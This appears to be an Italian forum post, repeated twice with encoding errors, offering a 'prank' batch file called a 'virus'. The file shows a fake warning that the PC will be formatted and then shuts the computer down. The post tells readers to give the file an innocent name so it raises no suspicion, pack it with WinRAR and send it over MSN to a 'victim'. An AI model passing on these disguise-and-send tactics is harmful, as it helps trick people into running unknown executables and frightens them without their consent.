Guida per fare 1 piccolo scherzo che farà saltare in aria i vostri amici o nemici .
Nessun danno provocato, il file si limiterà ad inviare 1 messaggio di allarme con la minaccia di 1 formattazione generale del PC.
Sembrerà un vero e proprio atttacco da 1 Cracker,
Poi partirà un Countdown.. e alla fine il PC si spegnerà ...
L'ho già testato e funziona...inutile dire che chi l'ha provato è saltato dalla sedia a staccare la corrente per paura che davvero ciಠsi verificasse.
Utile è divertente
Ricordo che comunque è 1 scherzetto e che nn provoca danni
Codice:
@ECHO OFF
@rem Batch virus by Lotho
cls
echo Adesso il tuo pc si formattera'... Ops!
pause
shutdown -s
Scrivete questa riga di comando sul blocco note e salva in estensione .bat
(es: virus.bat o mio.bat ) ma per nn destare sospetti vi conviene nominarli in 1 altro modo Wink
Poi se volete mandarlo a qualcuno via MSN dovrete archiviarlo con winRar, rinominatelo come pi๠vi piace e inviatelo...
Appena la vittima lo aprirà .... sorpresa...
Comunque potete provarlo voi stessi sul vostro PC.... sempre che vi fidiate del sottoscritto...
Nessun danno provocato, il file si limiterà ad inviare 1 messaggio di allarme con la minaccia di 1 formattazione generale del PC.
Sembrerà un vero e proprio atttacco da 1 Cracker,
Poi partirà un Countdown.. e alla fine il PC si spegnerà ...
L'ho già testato e funziona...inutile dire che chi l'ha provato è saltato dalla sedia a staccare la corrente per paura che davvero ciಠsi verificasse.
Utile è divertente
Ricordo che comunque è 1 scherzetto e che nn provoca danni
Codice:
@ECHO OFF
@rem Batch virus by Lotho
cls
echo Adesso il tuo pc si formattera'... Ops!
pause
shutdown -s
Scrivete questa riga di comando sul blocco note e salva in estensione .bat
(es: virus.bat o mio.bat ) ma per nn destare sospetti vi conviene nominarli in 1 altro modo Wink
Poi se volete mandarlo a qualcuno via MSN dovrete archiviarlo con winRar, rinominatelo come pi๠vi piace e inviatelo...
Appena la vittima lo aprirà .... sorpresa...
Comunque potete provarlo voi stessi sul vostro PC.... sempre che vi fidiate del sottoscritto...